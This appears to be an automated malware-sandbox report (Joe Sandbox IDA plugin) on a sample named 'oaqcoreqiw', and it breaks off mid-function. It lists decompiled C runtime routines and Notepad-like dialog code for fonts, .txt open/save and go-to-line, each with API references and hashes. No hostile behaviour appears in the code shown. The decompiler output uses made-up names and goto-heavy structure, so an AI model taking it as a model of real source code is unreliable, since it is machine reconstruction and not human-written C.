                                                  				intOrPtr _t77;
                                                  				void* _t80;
                                                  				intOrPtr* _t82;
                                                  				signed int _t83;
                                                  				signed int _t86;
                                                  				intOrPtr _t88;
                                                  				void* _t92;
                                                  
                                                  				_t80 = __edx;
                                                  				_push(__ebx);
                                                  				_push(__esi);
                                                  				_t86 = 0;
                                                  				if(_a12 <= 0) {
                                                  					L5:
                                                  					return _t38;
                                                  				} else {
                                                  					_push(__edi);
                                                  					_t82 =  &_a12;
                                                  					while(1) {
                                                  						_t82 = _t82 + 4;
                                                  						_t38 = E010A412F(_a4, _a8,  *_t82);
                                                  						_t92 = _t92 + 0xc;
                                                  						if(_t38 != 0) {
                                                  							break;
                                                  						}
                                                  						_t86 = _t86 + 1;
                                                  						if(_t86 < _a12) {
                                                  							continue;
                                                  						} else {
                                                  							goto L5;
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					E010A4060(0, _t80);
                                                  					asm("int3");
                                                  					_push(0x14);
                                                  					_push(0x10bf590);
                                                  					E010A61F0(0, _t82, _t86);
                                                  					_t66 = 0;
                                                  					_v32 = 0;
                                                  					__eflags = _a4 - 5;
                                                  					if(_a4 <= 5) {
                                                  						_t88 = E010A7A00();
                                                  						_v36 = _t88;
                                                  						E010AEBF8(0, _t80, _t82, _t88, __eflags);
                                                  						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                  						_v8 = _v8 & 0;
                                                  						_t83 = E010A8C83(0xb8, 1);
                                                  						_v40 = _t83;
                                                  						__eflags = _t83;
                                                  						if(_t83 != 0) {
                                                  							E010A8834(0xc);
                                                  							_v8 = 1;
                                                  							E010B6250(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                  							_v8 = _v8 & 0x00000000;
                                                  							E010B698D();
                                                  							_t66 = E010B6B48(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                                  							_v32 = _t66;
                                                  							__eflags = _t66;
                                                  							if(_t66 == 0) {
                                                  								E010AEB5D(_t83);
                                                  								_t43 = E010AEA03(_t83);
                                                  							} else {
                                                  								__eflags = _a8;
                                                  								if(_a8 != 0) {
                                                  									_t60 = E010BA6E7(_a8, 0x10c1c34);
                                                  									__eflags = _t60;
                                                  									if(_t60 != 0) {
                                                  										 *0x10c2d94 = 1;
                                                  									}
                                                  								}
                                                  								E010A8834(0xc);
                                                  								_v8 = 2;
                                                  								_t25 = _t88 + 0x6c; // 0x6c
                                                  								E010AEC74(_t25, _t83);
                                                  								E010AEB5D(_t83);
                                                  								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                  								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                  									__eflags =  *0x10c1e64 & 0x00000001;
                                                  									if(( *0x10c1e64 & 0x00000001) == 0) {
                                                  										E010AEC74(0x10c1d9c,  *((intOrPtr*)(_t88 + 0x6c)));
                                                  										_t77 =  *0x10c1d9c; // 0x10c1da0
                                                  										_t32 = _t77 + 0x84; // 0x10c1e78
                                                  										 *0x10c1e70 =  *_t32;
                                                  										_t33 = _t77 + 0x90; // 0x10bd700
                                                  										 *0x10c1ecc =  *_t33;
                                                  										_t34 = _t77 + 0x74; // 0x1
                                                  										 *0x10c1e60 =  *_t34;
                                                  									}
                                                  								}
                                                  								_v8 = _v8 & 0x00000000;
                                                  								_t43 = E010B699C();
                                                  							}
                                                  						}
                                                  						_v8 = 0xfffffffe;
                                                  						E010B69CF(_t43, _t88);
                                                  						_t45 = _t66;
                                                  					} else {
                                                  						 *((intOrPtr*)(E010A6117())) = 0x16;
                                                  						E010A4035();
                                                  						_t45 = 0;
                                                  					}
                                                  					return E010A6235(_t45);
                                                  				}
                                                  				L20:
                                                  			}

                                                  0x010b69b5
                                                  0x010b69bc
                                                  0x010b69c1
                                                  0x010b686e
                                                  0x010b6873
                                                  0x010b6879
                                                  0x010b687e
                                                  0x010b687e
                                                  0x010b69c8
                                                  0x010b69c8
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 790675137-0
                                                  • Opcode ID: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction ID: efe6c5876d71e908daa36a8e4fc6b21211ce6033b50e6187086db5f758fb727b
                                                  • Opcode Fuzzy Hash: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction Fuzzy Hash: F941027240030AEFDB10AFE8E884BDD7BF4AF24314F10416DE9999A281DBB79601CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010B4EB3(void* __eflags, signed int _a4) {
                                                  				void* _t12;
                                                  				signed int _t13;
                                                  				signed int _t16;
                                                  				intOrPtr _t18;
                                                  				void* _t22;
                                                  				signed int _t35;
                                                  				long _t40;
                                                  
                                                  				_t13 = E010A732B(_t12);
                                                  				if(_t13 >= 0) {
                                                  					_t35 = _a4;
                                                  					if(E010AE743(_t35) == 0xffffffff) {
                                                  						L10:
                                                  						_t40 = 0;
                                                  					} else {
                                                  						_t18 =  *0x10c2de0; // 0xf22f58
                                                  						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                  							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								goto L7;
                                                  							}
                                                  						} else {
                                                  							L7:
                                                  							_t22 = E010AE743(2);
                                                  							if(E010AE743(1) == _t22) {
                                                  								goto L10;
                                                  							} else {
                                                  								L8:
                                                  								if(CloseHandle(E010AE743(_t35)) != 0) {
                                                  									goto L10;
                                                  								} else {
                                                  									_t40 = GetLastError();
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					E010AE6BD(_t35);
                                                  					 *((char*)( *((intOrPtr*)(0x10c2de0 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                  					if(_t40 == 0) {
                                                  						_t16 = 0;
                                                  					} else {
                                                  						_t16 = E010A60F6(_t40) | 0xffffffff;
                                                  					}
                                                  					return _t16;
                                                  				} else {
                                                  					return _t13 | 0xffffffff;
                                                  				}
                                                  			}











                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B4EB6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  • __get_osfhandle.LIBCMT ref: 010B4ECA
                                                  • __get_osfhandle.LIBCMT ref: 010B4EF5
                                                  • __get_osfhandle.LIBCMT ref: 010B4EFE
                                                  • __get_osfhandle.LIBCMT ref: 010B4F0A
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,00000000,00000109), ref: 010B4F11
                                                  • GetLastError.KERNEL32(?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,00000000,00000109), ref: 010B4F1B
                                                  • __free_osfhnd.LIBCMT ref: 010B4F28
                                                  • __dosmaperr.LIBCMT ref: 010B4F4A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                  • String ID:
                                                  • API String ID: 974577687-0
                                                  • Opcode ID: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction ID: f86e46c417653817b8e0905dd52ce2df119757fb38dfdc4208d81a367b7fdf73
                                                  • Opcode Fuzzy Hash: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction Fuzzy Hash: 1E118C3260511215E671227CA8CC7FE3BD85B92730F590388F9EECB1C3FE65C2418280
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2340() {
                                                  				struct %anon40 _v64;
                                                  				void _v156;
                                                  				int _t19;
                                                  				int _t23;
                                                  				void* _t25;
                                                  
                                                  				memcpy( &_v156, 0x10c3f40, 0x17 << 2);
                                                  				E010A66E0( &_v64, 0, 0x3c);
                                                  				_v64.hwndOwner =  *0x10c3f24;
                                                  				_v64.lpLogFont =  &_v156;
                                                  				_v64.lStructSize = 0x3c;
                                                  				_v64.Flags = 0x1000041;
                                                  				_t19 = ChooseFontW( &_v64);
                                                  				if(_t19 != 0) {
                                                  					_t25 =  *0x10c3f30;
                                                  					 *0x10c3f30 = CreateFontIndirectW( &_v156);
                                                  					memcpy(0x10c3f40,  &_v156, 0x17 << 2);
                                                  					_t23 = SendMessageW( *0x10c3f2c, 0x30,  *0x10c3f30, 1);
                                                  					if(_t25 != 0) {
                                                  						_t23 = DeleteObject(_t25);
                                                  					}
                                                  					return _t23;
                                                  				}
                                                  				return _t19;
                                                  			}









                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Font$ChooseCreateDeleteIndirectMessageObjectSend_memset
                                                  • String ID: <$A
                                                  • API String ID: 3794199884-570643782
                                                  • Opcode ID: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction ID: 7a29cddd51ea12a122c8cdcb81fdf194d50a3233dbb07d826403b7cab9581bec
                                                  • Opcode Fuzzy Hash: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction Fuzzy Hash: F71173729202099BEB609FA4ECC4BCE77B8F709704F004065F68DAB245DB765549CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A27B0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				void* _t8;
                                                  				void* _t15;
                                                  
                                                  				_t8 = _a8 - 0x110;
                                                  				if(_t8 == 0) {
                                                  					SetDlgItemInt(_a4, 0x194, SendMessageW( *0x10c3f2c, 0xc9, 0xffffffff, 0) + 1, 0);
                                                  					goto L7;
                                                  				} else {
                                                  					if(_t8 != 1) {
                                                  						L7:
                                                  						return 0;
                                                  					} else {
                                                  						_t15 = _a12 - 1;
                                                  						if(_t15 == 0) {
                                                  							SendMessageW( *0x10c3f2c, 0xb1, SendMessageW( *0x10c3f2c, 0xbb, GetDlgItemInt(_a4, 0x194, 0, 0) - 1, 0), _t18);
                                                  							EndDialog(_a4, 1);
                                                  							return 1;
                                                  						} else {
                                                  							if(_t15 != 1) {
                                                  								goto L7;
                                                  							} else {
                                                  								EndDialog(_a4, 2);
                                                  								return 1;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}






                                                  APIs
                                                  • EndDialog.USER32(?,00000002), ref: 010A27D6
                                                  • GetDlgItemInt.USER32(?,00000194,00000000,00000000), ref: 010A27F1
                                                  • SendMessageW.USER32(000000BB,-00000001,00000000), ref: 010A2806
                                                  • SendMessageW.USER32(000000B1,00000000,00000000), ref: 010A2819
                                                  • EndDialog.USER32(?,00000001), ref: 010A2824
                                                  • SendMessageW.USER32(000000C9,000000FF,00000000), ref: 010A2842
                                                  • SetDlgItemInt.USER32(?,00000194,00000001,00000000), ref: 010A2854
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DialogItem
                                                  • String ID:
                                                  • API String ID: 3626491743-0
                                                  • Opcode ID: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction ID: e6c11a7046e927d2f13821a542ba69f3963b244d109982ba229e30fd1d703c91
                                                  • Opcode Fuzzy Hash: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction Fuzzy Hash: AE014C31290209BFFB315BA4ED99FA63B64F708700F508421FAD9D81E4C7BB98619B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E010B6054(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                  				void* _t11;
                                                  				intOrPtr* _t17;
                                                  				intOrPtr* _t31;
                                                  				void* _t32;
                                                  
                                                  				_push(8);
                                                  				_push(0x10bf568);
                                                  				_t11 = E010A61F0(__ebx, __edi, __esi);
                                                  				_t31 =  *((intOrPtr*)(_t32 + 8));
                                                  				if(_t31 != 0) {
                                                  					E010A8834(0xd);
                                                  					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                                  					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10c19f8) {
                                                  						E010A8C4B( *(_t31 + 4));
                                                  					}
                                                  					 *(_t32 - 4) = 0xfffffffe;
                                                  					E010B6664();
                                                  					if( *_t31 != 0) {
                                                  						E010A8834(0xc);
                                                  						 *(_t32 - 4) = 1;
                                                  						E010AEB5D( *_t31);
                                                  						_t17 =  *_t31;
                                                  						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x10c1da0) {
                                                  							E010AEA03(_t17);
                                                  						}
                                                  						 *(_t32 - 4) = 0xfffffffe;
                                                  						E010B6670();
                                                  					}
                                                  					_t11 = E010A8C4B(_t31);
                                                  				}
                                                  				return E010A6235(_t11);
                                                  			}








                                                  APIs
                                                  • __lock.LIBCMT ref: 010B65D8
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 010B65EB
                                                  • _free.LIBCMT ref: 010B6601
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • __lock.LIBCMT ref: 010B661A
                                                  • ___removelocaleref.LIBCMT ref: 010B6629
                                                  • ___freetlocinfo.LIBCMT ref: 010B6642
                                                  • _free.LIBCMT ref: 010B6655
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 556454624-0
                                                  • Opcode ID: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
                                                  • Instruction ID: d4aedcfcff14dbf283d9147e3305e122552913258adb3f2100576e80a287de2f
                                                  • Opcode Fuzzy Hash: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
                                                  • Instruction Fuzzy Hash: 6601F531402302E6EB787FA8D9887DD7BE0AF24B12F5485AEE1D5AA0D0CF3685C0CE15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E010A7B33(void* __ebx, void* __edi) {
                                                  				void* __esi;
                                                  				void* _t3;
                                                  				intOrPtr _t6;
                                                  				long _t14;
                                                  				long* _t27;
                                                  
                                                  				E010A461A(_t3);
                                                  				if(E010A8983() != 0) {
                                                  					_t6 = E010A80A2(_t5, E010A7893);
                                                  					 *0x10c15a0 = _t6;
                                                  					__eflags = _t6 - 0xffffffff;
                                                  					if(_t6 == 0xffffffff) {
                                                  						goto L1;
                                                  					} else {
                                                  						_t27 = E010A8C83(1, 0x3b8);
                                                  						__eflags = _t27;
                                                  						if(_t27 == 0) {
                                                  							L6:
                                                  							E010A7BA9();
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						} else {
                                                  							__eflags = E010A80CC(_t9,  *0x10c15a0, _t27);
                                                  							if(__eflags == 0) {
                                                  								goto L6;
                                                  							} else {
                                                  								_push(0);
                                                  								_push(_t27);
                                                  								E010A7A87(__ebx, __edi, _t27, __eflags);
                                                  								_t14 = GetCurrentThreadId();
                                                  								_t27[1] = _t27[1] | 0xffffffff;
                                                  								 *_t27 = _t14;
                                                  								__eflags = 1;
                                                  								return 1;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					E010A7BA9();
                                                  					return 0;
                                                  				}
                                                  			}









                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 010A7B33
                                                    • Part of subcall function 010A461A: RtlEncodePointer.NTDLL(00000000,?,010A7B38,010A3D79,010BEFC0,00000014), ref: 010A461D
                                                    • Part of subcall function 010A461A: __initp_misc_winsig.LIBCMT ref: 010A463E
                                                  • __mtinitlocks.LIBCMT ref: 010A7B38
                                                    • Part of subcall function 010A8983: InitializeCriticalSectionAndSpinCount.KERNEL32(010C15B0,00000FA0,?,?,010A7B3D,010A3D79,010BEFC0,00000014), ref: 010A89A1
                                                  • __mtterm.LIBCMT ref: 010A7B41
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A889F
                                                    • Part of subcall function 010A7BA9: _free.LIBCMT ref: 010A88A6
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(010C15B0,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A88C8
                                                  • __calloc_crt.LIBCMT ref: 010A7B66
                                                  • __initptd.LIBCMT ref: 010A7B88
                                                  • GetCurrentThreadId.KERNEL32 ref: 010A7B8F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 757573777-0
                                                  • Opcode ID: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction ID: 7eb80ed30f49d0daac90950ce86de811a83d6e2ce3fd4cbae2d4194d1fdabfb5
                                                  • Opcode Fuzzy Hash: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction Fuzzy Hash: 23F0F6725A93135EE2743BF8BC02BDA76C48F212B2F98CB2AE2E0D50C0FF2280008540
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A16A0() {
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v60;
                                                  				WCHAR* _v64;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				intOrPtr _v88;
                                                  				struct tagOFNA _v92;
                                                  				short _v612;
                                                  				int _t24;
                                                  
                                                  				E010A66E0( &_v92, 0, 0x58);
                                                  				lstrcpyW( &_v612, L"*.txt");
                                                  				_v88 =  *0x10c3f24;
                                                  				_v84 =  *0x10c3f20;
                                                  				_v64 =  &_v612;
                                                  				_v92 = 0x58;
                                                  				_v80 = 0x10c47c4;
                                                  				_v60 = 0;
                                                  				_v40 = 0x881864;
                                                  				_v24 = E010A15A0;
                                                  				_v20 = 0x190;
                                                  				_v32 = L"txt";
                                                  				 *0x10c4c88 = 0;
                                                  				 *0x10c4c8c = 1;
                                                  				_t24 = GetOpenFileNameW( &_v92);
                                                  				if(_t24 != 0) {
                                                  					return E010A1140(_v64,  *0x10c4c88);
                                                  				}
                                                  				return _t24;
                                                  			}
















                                                  APIs
                                                  • _memset.LIBCMT ref: 010A16B1
                                                  • lstrcpyW.KERNEL32 ref: 010A16C5
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 010A172D
                                                    • Part of subcall function 010A1140: GetWindowTextLengthW.USER32 ref: 010A1153
                                                    • Part of subcall function 010A1140: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileLengthMessageNameOpenSendTextWindow_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 4227841899-3431318540
                                                  • Opcode ID: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction ID: 92d52003eed7d8680851fe337cb19797e5aff78e477e03f560248714daebb773
                                                  • Opcode Fuzzy Hash: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction Fuzzy Hash: 891117B4D0024C9FDB10DFE4E888BDEBBF8BB08304F004119E594AB284EBBA5548CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A1770() {
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v60;
                                                  				WCHAR* _v64;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				intOrPtr _v88;
                                                  				struct tagOFNA _v92;
                                                  				short _v612;
                                                  				signed int _t24;
                                                  
                                                  				E010A66E0( &_v92, 0, 0x58);
                                                  				lstrcpyW( &_v612, L"*.txt");
                                                  				_v88 =  *0x10c3f24;
                                                  				_v84 =  *0x10c3f20;
                                                  				_v64 =  &_v612;
                                                  				 *0x10c4c88 =  *0x10c47c0;
                                                  				_v92 = 0x58;
                                                  				_v80 = 0x10c47c4;
                                                  				_v60 = 0;
                                                  				_v40 = 0x880866;
                                                  				_v24 = E010A15A0;
                                                  				_v20 = 0x190;
                                                  				_v32 = L"txt";
                                                  				 *0x10c4c8c = 0;
                                                  				_t24 = GetSaveFileNameW( &_v92);
                                                  				asm("sbb eax, eax");
                                                  				return  ~( ~_t24);
                                                  			}
















                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 524411262-3431318540
                                                  • Opcode ID: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction ID: 40828d66436edc55ada890cdc79ebb65e4e918d35b8b62dc30c5eb75b4e12477
                                                  • Opcode Fuzzy Hash: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction Fuzzy Hash: CF01E9B4D4024D9FDB50DFE4E8897DEBBF8BB08704F004519E495EB284E77A55488F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E010B52E1(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t45;
                                                  				signed int _t46;
                                                  				signed int _t47;
                                                  				signed int _t50;
                                                  				signed int _t53;
                                                  				signed int _t54;
                                                  				signed int _t59;
                                                  				void* _t64;
                                                  				signed int _t66;
                                                  				void* _t68;
                                                  				signed int _t75;
                                                  				signed int _t79;
                                                  				signed short _t80;
                                                  				signed int _t82;
                                                  				void* _t83;
                                                  				signed int _t90;
                                                  				void* _t91;
                                                  				signed int _t92;
                                                  				signed int _t94;
                                                  				signed int* _t97;
                                                  
                                                  				_t46 = E010A732B(_t45);
                                                  				if(_t46 >= 0) {
                                                  					_t97 = _a8;
                                                  					_t47 = E010A66B0(_t97);
                                                  					_t79 = _t97[3];
                                                  					_t94 = _t47;
                                                  					__eflags = _t79 & 0x00000082;
                                                  					if((_t79 & 0x00000082) != 0) {
                                                  						__eflags = _t79 & 0x00000040;
                                                  						if((_t79 & 0x00000040) == 0) {
                                                  							_t75 = 0;
                                                  							__eflags = _t79 & 0x00000001;
                                                  							if((_t79 & 0x00000001) == 0) {
                                                  								L10:
                                                  								_t50 = _t97[3] & 0xffffffef | 0x00000002;
                                                  								_t97[3] = _t50;
                                                  								_t97[1] = _t75;
                                                  								__eflags = _t50 & 0x0000010c;
                                                  								if((_t50 & 0x0000010c) == 0) {
                                                  									_t64 = E010A4BEE();
                                                  									__eflags = _t97 - _t64 + 0x20;
                                                  									if(_t97 == _t64 + 0x20) {
                                                  										L13:
                                                  										_t66 = E010AE41E(_t94);
